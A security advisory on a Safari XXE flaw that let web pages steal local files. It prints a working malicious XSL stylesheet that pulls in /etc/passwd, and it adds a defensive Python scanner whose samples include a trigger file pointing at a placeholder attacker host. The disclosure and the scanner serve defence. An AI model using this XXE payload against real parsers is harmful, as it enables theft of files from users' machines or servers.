CESA-2009-006 - rev 1


[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog, if you want to subscribe to new findings, is at http://scarybeastsecurity.blogspot.com/]

Apple Safari local file theft bug



Programs affected: Safari prior to version 4
Severity: Websites can steal files from the victim's computer
Vendor URL (copy): APPLE-SA-2009-06-08-1
Initial report: Jun 2008

Safari was vulnerable to an XXE attack against a relatively obscure area of XML parsing. As a recap, XXE (XML eXternal Entity) attacks abuse a built-in feature of XML, the external entity declared in a document's DTD, to fetch files (or network resources) and embed their contents in an attacker-controlled document. XXE attacks are most commonly seen server-side, where a server parses attacker-supplied XML; this advisory notes a client-side variant against the Safari browser, where the victim's browser is the vulnerable parser and the file that gets pulled in comes from the victim's own disk.

Safari's XSL stylesheet handling was vulnerable to XXE attacks. An XSL stylesheet is itself an XML document, so it may carry a DTD. By serving an arbitrary XML file that refers to an evil XSL resource (via an xml-stylesheet processing instruction), the attacker gets Safari to parse the stylesheet, expand an external entity declared in its DTD, and thereby copy a local file into the transformed output. Once the file contents are part of the resulting document, a script emitted by the same stylesheet can read them out of the DOM.

Here's the evil XSL stylesheet, including the DTD that declares the external entity:

<!-- DTD: declares an external general entity that resolves to a local file.
     When Safari parses the stylesheet, it substitutes the file's contents
     wherever &ent; appears. -->
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
<!-- Entity reference: expands to the contents of /etc/passwd in the output. -->
&ent;
<!-- The script reads the rendered output, which now contains the file. -->
<script>
alert(document.body.innerHTML);
</script>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>
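The following is an added example, not code from the original advisory or from Apple: a small, stdlib-only Python scanner that flags the XML features this bug chains together (an external entity declared in a DTD, an external DTD subset, and an xml-stylesheet processing instruction pointing at an absolute URL). It parses with Python's expat, which does not fetch external entities unless an ExternalEntityRefHandler is installed, so the scan itself cannot be turned into an XXE. The three embedded inputs are constructed samples: the advisory's stylesheet above, a trigger document with a placeholder host name (attacker.invalid), and a clean stylesheet for comparison.

```python
# Added example: scan XML/XSL for the features the Safari XXE bug abuses.
# Uses only the standard library; expat never loads external entities here.
import re
import xml.parsers.expat

# Constructed sample 1: the advisory's stylesheet, with its external entity.
EVIL_XSL = b"""<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html><body>
  <p/>
  &ent;
  <script>alert(document.body.innerHTML);</script>
  </body></html>
</xsl:template>
</xsl:stylesheet>
"""

# Constructed sample 2: the kind of "random XML file" that points the browser
# at the stylesheet. The host name is a placeholder, not a real site.
TRIGGER_XML = b"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="http://attacker.invalid/evil.xsl"?>
<doc/>
"""

# Constructed sample 3: a stylesheet with no DTD, which should scan clean.
BENIGN_XSL = b"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><html><body>hello</body></html></xsl:template>
</xsl:stylesheet>
"""

_ABSOLUTE_URL = re.compile(r"^(?:[A-Za-z][A-Za-z0-9+.-]*:|//)")
_PSEUDO_ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")


def scan_xml(data):
    """Return a list of (kind, name, target) findings for one XML document.

    kinds: external-entity / external-parameter-entity (DTD declares an
             entity with a SYSTEM or PUBLIC identifier: the XXE primitive),
           external-dtd (the DOCTYPE itself loads an external subset),
           absolute-stylesheet-href (xml-stylesheet PI with an absolute URL;
             the scanner cannot know the page's origin, so all are reported).
    """
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            findings.append(("external-dtd", name, system_id or public_id))

    def on_entity_decl(name, is_parameter, value, base, system_id,
                       public_id, notation_name):
        # Internal entities carry a value and no identifiers; only the
        # SYSTEM/PUBLIC ones can reach the filesystem or the network.
        if system_id is not None or public_id is not None:
            kind = "external-parameter-entity" if is_parameter else "external-entity"
            findings.append((kind, name, system_id or public_id))

    def on_pi(target, pi_data):
        if target != "xml-stylesheet":
            return
        attrs = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
                 for m in _PSEUDO_ATTR.finditer(pi_data)}
        href = attrs.get("href", "")
        if _ABSOLUTE_URL.match(href):
            findings.append(("absolute-stylesheet-href", attrs.get("type", ""), href))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ProcessingInstructionHandler = on_pi
    # No ExternalEntityRefHandler is installed, so &ent; is not fetched.
    parser.Parse(data, True)  # raises ExpatError on malformed input
    return findings


if __name__ == "__main__":
    for label, sample in (("evil.xsl", EVIL_XSL), ("trigger.xml", TRIGGER_XML),
                          ("benign.xsl", BENIGN_XSL)):
        print(label, scan_xml(sample))
```

Run against the advisory's stylesheet, the scanner reports the entity "ent" pointing at file:///etc/passwd; the trigger document is reported for its absolute stylesheet href, and the clean stylesheet produces nothing. A scanner like this is a triage aid for stored XML/XSL content, not a substitute for the real fix, which is for the XML/XSLT engine to refuse to resolve external entities when processing untrusted documents.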

Demos

Click here for Safari 3 / MacOS

Click here for Safari 3 / Windows

Credits


Chris Evans
scarybeasts@gmail.com